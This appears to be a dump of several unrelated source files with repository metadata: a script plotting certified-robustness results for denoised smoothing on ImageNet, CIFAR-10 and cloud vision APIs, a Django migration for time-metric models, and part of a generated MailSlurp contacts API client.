            Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_{2}/{3}/dncnn/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise, denoiser, surrogate)), r"$\sigma = {0:.2f}$".format(noise))
            for noise in [0.12, 0.25, 0.5, 1.0]
            for denoiser in ['imagenet_smoothness_obj_adam_1e-5_20epochs']
        ]
    # White-box baseline: classifiers trained with Gaussian noise augmentation (Cohen-style training)
    imagenet_results[arch].cohen_training_N10000 = [
        Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{1}/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise, arch)), r"$\sigma = {0:.2f}$".format(noise))
        for noise in [0.25, 0.5, 1.0]
    ]
# Imagenet plots
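# Two plot families per architecture: "Full-Access" assumes the denoiser was
# trained against the certified classifier itself, while "Query-Access" uses
# only denoisers trained against the other (surrogate) architectures.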
for arch in imagenet_archs:
    ### Full-Access
    plot_certified_accuracy_per_sigma_best_model(
        "analysis/plots/imagenet/full_access/MODEL_{}_Stab_vs_Clf".format(arch), '{} Stab vs Clf'.format(arch), 2.25,
        methods=imagenet_results[arch].all_imagenet_stability_obj_N10000[arch], label='Stab+MSE',
        methods_base=imagenet_results[arch].all_imagenet_classification_obj_N10000[arch], label_base='Clf+MSE',
        sigmas=[0.12, 0.25, 0.5, 1.0])
    for sigma in [0.25, 0.50, 1.00]:
        plot_certified_accuracy_one_sigma_best_model_multiple_methods(
            "analysis/plots/imagenet/full_access/MODEL_{}_all_methods_stability_sigma_{:.0f}".format(arch, sigma * 100),
            'fixed_imagenet_best_models', 1.0,
            methods_labels_colors_dashes=[
                (imagenet_results[arch].cohen_training_N10000, 'White-box', 'b', [1, 0]),
                (imagenet_results[arch].all_imagenet_stability_obj_N10000[arch], 'Stab+MSE', 'orange', [4, 2]),
                (imagenet_results[arch].all_imagenet_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
                (imagenet_results[arch].imagenet_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
            ],
            sigma=sigma)
    ### Query-Access
    # sorted() keeps the surrogate -> colour/dash assignment deterministic;
    # iterating a bare set would depend on hash order.
    surrogate_models = [
        (imagenet_results[arch].all_imagenet_stability_obj_N10000[b], 'Stab+MSE-{}'.format(b), color, dashes)
        for b, color, dashes in zip(sorted(set(imagenet_archs) - {arch}), ['g', 'orange'], [[6, 2], [4, 2]])
    ]
    for sigma in [0.25, 0.50, 1.00]:
        plot_certified_accuracy_one_sigma_best_model_multiple_methods(
            "analysis/plots/imagenet/query_access/MODEL_{}_stability_sigma_{:.0f}_with_surrogate".format(arch, sigma * 100),
            'blackbox_imagenet_best_models', 1.0,
            methods_labels_colors_dashes=[
                (imagenet_results[arch].cohen_training_N10000, 'White-box', 'b', [1, 0]),
            ] + surrogate_models + [
                (imagenet_results[arch].all_imagenet_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
                (imagenet_results[arch].imagenet_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
            ],
            sigma=sigma)
##################################################################################################
# VISION API
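# Certification logs for the commercial vision APIs (Google, Azure, AWS, Clarifai).
# Each provider is evaluated at sigma in {0.12, 0.25} with: no denoiser, the MSE
# denoiser, and classification-/stability-objective denoisers trained on
# ResNet18/34/50 surrogates. The "_1k" Azure run appears to use 1000 samples
# instead of the default 100 (see the 1k_vs_100 plot below).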
## All providers share one directory layout, so a small helper builds each Line list.
def _api_lines(provider, denoiser_dir, suffix=''):
    return [
        Line(ApproximateAccuracy_API("data/certify/vision_api/{0}/{1}/{2:.2f}{3}/log.txt".format(provider, denoiser_dir, noise, suffix)),
             r"$\sigma = {0:.2f}$".format(noise))
        for noise in [0.12, 0.25]
    ]

google_api_mse = _api_lines('google', 'imagenet_denoiser_mse')
google_api_no_noise = _api_lines('google', 'no_denoiser')
azure_api_mse = _api_lines('azure', 'imagenet_denoiser_mse')
azure_api_mse_1k = _api_lines('azure', 'imagenet_denoiser_mse', suffix='_1k')
azure_api_no_noise = _api_lines('azure', 'no_denoiser')
aws_api_mse = _api_lines('aws', 'imagenet_denoiser_mse')
aws_api_no_noise = _api_lines('aws', 'no_denoiser')
clarifai_api_mse = _api_lines('clarifai', 'imagenet_denoiser_mse')
clarifai_api_no_noise = _api_lines('clarifai', 'no_denoiser')

_CLF = 'imagenet_denoiser_classification_obj_adam_1e-5_20epochs'
_SMOOTH = 'imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs'
azure_api_clf_resnet18 = _api_lines('azure', _CLF + '/resnet18')
azure_api_clf_resnet34 = _api_lines('azure', _CLF + '/resnet34')
azure_api_clf_resnet50 = _api_lines('azure', _CLF + '/resnet50')
clarifai_api_clf_resnet18 = _api_lines('clarifai', _CLF + '/resnet18')
clarifai_api_clf_resnet34 = _api_lines('clarifai', _CLF + '/resnet34')
clarifai_api_clf_resnet50 = _api_lines('clarifai', _CLF + '/resnet50')
google_api_clf_resnet18 = _api_lines('google', _CLF + '/resnet18')
google_api_clf_resnet34 = _api_lines('google', _CLF + '/resnet34')
google_api_clf_resnet50 = _api_lines('google', _CLF + '/resnet50')
aws_api_clf_resnet18 = _api_lines('aws', _CLF + '/resnet18')
aws_api_clf_resnet34 = _api_lines('aws', _CLF + '/resnet34')
aws_api_clf_resnet50 = _api_lines('aws', _CLF + '/resnet50')
azure_api_smooth_resnet18 = _api_lines('azure', _SMOOTH + '/resnet18')
azure_api_smooth_resnet34 = _api_lines('azure', _SMOOTH + '/resnet34')
azure_api_smooth_resnet50 = _api_lines('azure', _SMOOTH + '/resnet50')
aws_api_smooth_resnet18 = _api_lines('aws', _SMOOTH + '/resnet18')
aws_api_smooth_resnet34 = _api_lines('aws', _SMOOTH + '/resnet34')
aws_api_smooth_resnet50 = _api_lines('aws', _SMOOTH + '/resnet50')
clarifai_api_smooth_resnet18 = _api_lines('clarifai', _SMOOTH + '/resnet18')
clarifai_api_smooth_resnet34 = _api_lines('clarifai', _SMOOTH + '/resnet34')
clarifai_api_smooth_resnet50 = _api_lines('clarifai', _SMOOTH + '/resnet50')
google_api_smooth_resnet18 = _api_lines('google', _SMOOTH + '/resnet18')
google_api_smooth_resnet34 = _api_lines('google', _SMOOTH + '/resnet34')
google_api_smooth_resnet50 = _api_lines('google', _SMOOTH + '/resnet50')
# Group the per-provider results so the comparison plots can be generated in one loop.
vision_api_results = {
    'azure': (azure_api_mse, azure_api_no_noise,
              {18: azure_api_smooth_resnet18, 34: azure_api_smooth_resnet34, 50: azure_api_smooth_resnet50},
              {18: azure_api_clf_resnet18, 34: azure_api_clf_resnet34, 50: azure_api_clf_resnet50}),
    'google': (google_api_mse, google_api_no_noise,
               {18: google_api_smooth_resnet18, 34: google_api_smooth_resnet34, 50: google_api_smooth_resnet50},
               {18: google_api_clf_resnet18, 34: google_api_clf_resnet34, 50: google_api_clf_resnet50}),
    'aws': (aws_api_mse, aws_api_no_noise,
            {18: aws_api_smooth_resnet18, 34: aws_api_smooth_resnet34, 50: aws_api_smooth_resnet50},
            {18: aws_api_clf_resnet18, 34: aws_api_clf_resnet34, 50: aws_api_clf_resnet50}),
    'clarifai': (clarifai_api_mse, clarifai_api_no_noise,
                 {18: clarifai_api_smooth_resnet18, 34: clarifai_api_smooth_resnet34, 50: clarifai_api_smooth_resnet50},
                 {18: clarifai_api_clf_resnet18, 34: clarifai_api_clf_resnet34, 50: clarifai_api_clf_resnet50}),
}
for provider, (mse, no_noise, smooth, clf) in vision_api_results.items():
    for depth in [18, 34, 50]:
        # Stab+MSE denoiser vs the plain MSE denoiser
        plot_certified_accuracy_per_sigma_against_baseline(
            "analysis/plots/vision_api/{}/denoiser_finetune_smooth_res{}_vs_denoiser_mse".format(provider, depth), '', 0.6,
            methods=smooth[depth], label='Stab+MSE on ResNet{}'.format(depth),
            methods_base=mse, label_base="MSE")
        # Stability objective vs classification objective on the same surrogate
        plot_certified_accuracy_per_sigma_against_baseline(
            "analysis/plots/vision_api/{}/smooth_vs_clf_resnet{}".format(provider, depth), '', 0.6,
            methods=smooth[depth], label='Stab+MSE on ResNet{}'.format(depth),
            methods_base=clf[depth], label_base="Clf+MSE on ResNet{}".format(depth))
    # Overall comparison: Stab+MSE (best over all three surrogates) vs MSE vs no denoiser
    plot_certified_accuracy_per_sigma_against_baseline_finetune(
        "analysis/plots/vision_api/{}/total_comparison".format(provider), '', 0.6,
        methods=mse, label="MSE",
        methods_finetune=smooth[18] + smooth[34] + smooth[50], label_finetune="Stab+MSE best",
        methods_base=no_noise, label_base="No Denoiser")
plot_certified_accuracy_per_sigma_against_baseline(
    "analysis/plots/vision_api/azure/1k_vs_100", '', 0.6,
    methods=azure_api_mse_1k, label='MSE with 1k',
    methods_base=azure_api_mse, label_base="MSE with 100")
########################################################################################
# Latex
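# LaTeX tables of the certified-accuracy upper envelope; the three numeric
# arguments are presumably the radius grid (start=0.25, stop=1.5, step=0.25).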
for arch in imagenet_archs:
    latex_table_certified_accuracy_upper_envelope(
        "analysis/latex/fullAccess_imagenet_certified_outer_envelop_{}_denoisers".format(arch), 0.25, 1.5, 0.25,
        imagenet_results[arch].all_imagenet_stability_obj_N10000[arch])
    latex_table_certified_accuracy_upper_envelope(
        "analysis/latex/queryAccess_imagenet_certified_outer_envelop_{}_denoisers".format(arch), 0.25, 1.5, 0.25,
        sum([imagenet_results[arch].all_imagenet_stability_obj_N10000[b] for b in sorted(set(imagenet_archs) - {arch})], []))
    latex_table_certified_accuracy_upper_envelope(
        "analysis/latex/imagenet_certified_outer_envelop_{}_no_denoisers".format(arch), 0.25, 1.5, 0.25,
        imagenet_results[arch].imagenet_no_denoiser_N10000)
    latex_table_certified_accuracy_upper_envelope(
        "analysis/latex/imagenet_certified_outer_envelop_{}_whitebox".format(arch), 0.25, 1.5, 0.25,
        imagenet_results[arch].cohen_training_N10000)
latex_table_certified_accuracy_upper_envelope(
    "analysis/latex/cifar10_certified_outer_envelop_no_denoisers", 0.25, 1.5, 0.25,
    cifar_no_denoiser_N10000)
latex_table_certified_accuracy_upper_envelope(
    "analysis/latex/cifar10_certified_outer_envelop_whitebox", 0.25, 1.5, 0.25,
    all_cifar_cohen_N10000)
latex_table_certified_accuracy_upper_envelope(
    "analysis/latex/queryAccess_cifar10_certified_outer_envelop", 0.25, 1.5, 0.25,
    all_exp_resnet110_queryAccess_cifar10_stability)
latex_table_certified_accuracy_upper_envelope(
    "analysis/latex/fullAccess_cifar10_certified_outer_envelop", 0.25, 1.5, 0.25,
    all_exp_resnet110_fullAccess_cifar10_stability)
| 58.58631 | 227 | 0.683211 | 7,704 | 59,055 | 4.864486 | 0.037643 | 0.028178 | 0.021854 | 0.009766 | 0.938014 | 0.919655 | 0.894626 | 0.88043 | 0.858123 | 0.825248 | 0 | 0.065321 | 0.177716 | 59,055 | 1,007 | 228 | 58.644489 | 0.706425 | 0.01353 | 0 | 0.504751 | 0 | 0.055819 | 0.298465 | 0.232218 | 0.001188 | 0 | 0 | 0 | 0.001188 | 1 | 0.019002 | false | 0 | 0.010689 | 0.002375 | 0.042755 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9bcc13bcb586b3236b3f09361fa9a17cd2cb00c | 6,997 | py | Python | time_metrics/migrations/0001_initial.py | wallstreetweb/django-time-metrics | 02196d4ab3b49186a2ff228545d290859a742a31 | [
"MIT"
] | null | null | null | time_metrics/migrations/0001_initial.py | wallstreetweb/django-time-metrics | 02196d4ab3b49186a2ff228545d290859a742a31 | [
"MIT"
] | null | null | null | time_metrics/migrations/0001_initial.py | wallstreetweb/django-time-metrics | 02196d4ab3b49186a2ff228545d290859a742a31 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-21 16:23
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
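# Initial schema for django-time-metrics: a Metric definition plus per-period
# rollup tables (MetricItem and day/week/month/quarter/year variants), each holding
# a count, a date, a generic foreign key (content_type + object_id) to the object
# being measured, and a django.contrib site.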
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
        ('sites', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='DayMetric',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('count', models.IntegerField(default=0)),
                ('date_up', models.DateField(default=datetime.date.today)),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
            ],
            options={
                'verbose_name': 'day metric',
                'verbose_name_plural': 'day metrics',
            },
        ),
        migrations.CreateModel(
            name='Metric',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('name', models.CharField(max_length=90)),
                ('description', models.TextField(blank=True, null=True)),
                ('slug', models.SlugField(max_length=100, unique=True)),
            ],
            options={
                'verbose_name': 'metric',
                'verbose_name_plural': 'metrics',
            },
        ),
        migrations.CreateModel(
            name='MetricItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('count', models.IntegerField(default=0)),
                ('date_up', models.DateField(default=datetime.date.today)),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
                ('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
                ('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
            ],
            options={
                'verbose_name': 'metric item',
                'verbose_name_plural': 'metric items',
            },
        ),
        migrations.CreateModel(
            name='MonthMetric',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('count', models.IntegerField(default=0)),
                ('date_up', models.DateField(default=datetime.date.today)),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
                ('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
                ('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
            ],
            options={
                'verbose_name': 'month metric',
                'verbose_name_plural': 'month metrics',
            },
        ),
        migrations.CreateModel(
            name='QuarterMetric',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('count', models.IntegerField(default=0)),
                ('date_up', models.DateField(default=datetime.date.today)),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
                ('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
                ('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
            ],
            options={
                'verbose_name': 'quarter metric',
                'verbose_name_plural': 'quarter metrics',
            },
        ),
        migrations.CreateModel(
            name='WeekMetric',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('count', models.IntegerField(default=0)),
                ('date_up', models.DateField(default=datetime.date.today)),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
                ('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
                ('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
            ],
            options={
                'verbose_name': 'week metric',
                'verbose_name_plural': 'week metrics',
            },
        ),
        migrations.CreateModel(
            name='YearMetric',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('count', models.IntegerField(default=0)),
                ('date_up', models.DateField(default=datetime.date.today)),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
                ('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
                ('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
            ],
            options={
                'verbose_name': 'year metric',
                'verbose_name_plural': 'year metrics',
            },
        ),
        migrations.AddField(
            model_name='daymetric',
            name='metric',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric'),
        ),
        migrations.AddField(
            model_name='daymetric',
            name='site',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site'),
        ),
    ]
| 49.274648 | 147 | 0.583965 | 672 | 6,997 | 5.927083 | 0.159226 | 0.06352 | 0.066784 | 0.104946 | 0.727843 | 0.727843 | 0.707758 | 0.707758 | 0.707758 | 0.681145 | 0 | 0.006895 | 0.274546 | 6,997 | 141 | 148 | 49.624113 | 0.777778 | 0.009576 | 0 | 0.616541 | 1 | 0 | 0.169193 | 0.024975 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045113 | 0 | 0.075188 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9f69a8e9acd1db764be11e30be23d0e73ba21bc | 31,083 | py | Python | mailslurp_client/api/contact_controller_api.py | mailslurp/mailslurp-client-python | a1e9fdc6eb06e192909fd57a64813beb32419594 | [
"MIT"
] | 6 | 2020-04-30T07:47:42.000Z | 2022-03-24T20:58:58.000Z | mailslurp_client/api/contact_controller_api.py | mailslurp/mailslurp-client-python | a1e9fdc6eb06e192909fd57a64813beb32419594 | [
"MIT"
] | 1 | 2020-09-20T19:58:21.000Z | 2020-11-29T16:49:19.000Z | mailslurp_client/api/contact_controller_api.py | mailslurp/mailslurp-client-python | a1e9fdc6eb06e192909fd57a64813beb32419594 | [
"MIT"
] | 1 | 2019-08-09T14:55:50.000Z | 2019-08-09T14:55:50.000Z | # coding: utf-8
"""
MailSlurp API
MailSlurp is an API for sending and receiving emails from dynamically allocated email addresses. It's designed for developers and QA teams to test applications, process inbound emails, send templated notifications, attachments, and more. ## Resources - [Homepage](https://www.mailslurp.com) - Get an [API KEY](https://app.mailslurp.com/sign-up/) - Generated [SDK Clients](https://www.mailslurp.com/docs/) - [Examples](https://github.com/mailslurp/examples) repository # noqa: E501
The version of the OpenAPI document: 6.5.2
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from mailslurp_client.api_client import ApiClient
from mailslurp_client.exceptions import (  # noqa: F401
    ApiTypeError,
    ApiValueError
)
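# A minimal usage sketch -- an assumption based on the standard generated-client
# setup rather than part of this file; 'x-api-key' is MailSlurp's documented
# API-key header name:
#
#   import mailslurp_client
#   configuration = mailslurp_client.Configuration()
#   configuration.api_key['x-api-key'] = 'your-api-key'
#   with mailslurp_client.ApiClient(configuration) as api_client:
#       contacts = ContactControllerApi(api_client).get_contacts()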
class ContactControllerApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_contact(self, create_contact_options, **kwargs): # noqa: E501
"""Create a contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_contact(create_contact_options, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CreateContactOptions create_contact_options: createContactOptions (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ContactDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_contact_with_http_info(create_contact_options, **kwargs) # noqa: E501
def create_contact_with_http_info(self, create_contact_options, **kwargs): # noqa: E501
"""Create a contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_contact_with_http_info(create_contact_options, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CreateContactOptions create_contact_options: createContactOptions (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ContactDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'create_contact_options'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_contact" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'create_contact_options' is set
if self.api_client.client_side_validation and ('create_contact_options' not in local_var_params or # noqa: E501
local_var_params['create_contact_options'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `create_contact_options` when calling `create_contact`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_contact_options' in local_var_params:
body_params = local_var_params['create_contact_options']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ContactDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_contact(self, contact_id, **kwargs): # noqa: E501
"""Delete contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_contact(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_contact_with_http_info(contact_id, **kwargs) # noqa: E501
def delete_contact_with_http_info(self, contact_id, **kwargs): # noqa: E501
"""Delete contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_contact_with_http_info(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'contact_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contact" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'contact_id' is set
if self.api_client.client_side_validation and ('contact_id' not in local_var_params or # noqa: E501
local_var_params['contact_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `contact_id` when calling `delete_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'contact_id' in local_var_params:
path_params['contactId'] = local_var_params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts/{contactId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_contacts(self, **kwargs): # noqa: E501
"""Get all contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_contacts(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime before: Filter by created at before the given timestamp
:param int page: Optional page index in list pagination
:param datetime since: Filter by created at after the given timestamp
:param int size: Optional page size in list pagination
:param str sort: Optional createdAt sort direction ASC or DESC
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PageContactProjection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_all_contacts_with_http_info(**kwargs) # noqa: E501
def get_all_contacts_with_http_info(self, **kwargs): # noqa: E501
"""Get all contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_contacts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime before: Filter by created at before the given timestamp
:param int page: Optional page index in list pagination
:param datetime since: Filter by created at after the given timestamp
:param int size: Optional page size in list pagination
:param str sort: Optional createdAt sort direction ASC or DESC
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PageContactProjection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'before',
'page',
'since',
'size',
'sort'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_contacts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'before' in local_var_params and local_var_params['before'] is not None: # noqa: E501
query_params.append(('before', local_var_params['before'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'since' in local_var_params and local_var_params['since'] is not None: # noqa: E501
query_params.append(('since', local_var_params['since'])) # noqa: E501
if 'size' in local_var_params and local_var_params['size'] is not None: # noqa: E501
query_params.append(('size', local_var_params['size'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts/paginated', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageContactProjection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_contact(self, contact_id, **kwargs): # noqa: E501
"""Get contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ContactDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_contact_with_http_info(contact_id, **kwargs) # noqa: E501
def get_contact_with_http_info(self, contact_id, **kwargs): # noqa: E501
"""Get contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact_with_http_info(contact_id, async_req=True)
